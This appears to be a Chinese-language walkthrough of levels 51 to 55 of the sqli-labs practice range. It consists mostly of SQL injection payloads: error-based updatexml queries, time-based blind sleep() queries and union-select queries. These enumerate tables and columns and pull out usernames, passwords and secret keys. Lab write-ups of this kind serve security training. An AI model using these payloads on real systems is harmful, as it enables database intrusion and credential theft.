sqli-labs靶场（51-55）

51关

这关跟50关一样采用报错来查看

Less-51/?sort=1 and updatexml(1,concat(1,(select database())),1)--+

查表/Less-51/?sort=1'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

查列

/Less-51/?sort=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

查询username，password

/Less-51/?sort=1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

52关

这里没有报错没办法只能采用盲注来进行

/Less-52/?sort=1’ and if((ascii(substr(database(),1,1))=115),sleep(6),1) --+

解析表名：?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)--+ 第一位是 e

解析字段名：?sort=1’and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)--+ 第一位是 i

获取数据: ?sort=1’ and if((ascii(substr((select id from emails limit 0,1),1,1))>1),sleep(5),1)--+

53关

解析数据库名称：?sort=1 'and if((ascii(substr(database(),1,1))=115),sleep(5),1)--+ 第一位是 s

解析表名：?sort=1 'and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)--+ 第一位是 e

解析字段名：?sort=1 'and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)--+ 第一位是 i

54关

从54关开始，关卡开始有了难度，54关仅允许我们输入十次语句，十次语句时候该靶场就会对里面所有的库名，表名，列名进行一个刷新。所以从这关开始，所有的语句仅供参考。

这里爆到表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where%20table_schema=database() and table_name='r4bsp4sllk'--+  爆列名

?id=-1%27union%20select%201,group_concat(secret_C4O5),3%20from%20m3xab4chhv--+   获取key值

查到key把它复制到下面的框里提交就过关了

55关

这里跟上一关一样每个人的表列都不一样这里是 ）闭合方式

?id=-1)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+  爆表

?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='y3a9eaki2l'--+   爆到列

然后查询key的值进行提交

?id=-1) union select 1,group_concat(secret_4I3C),3 from y3a9eaki2l--+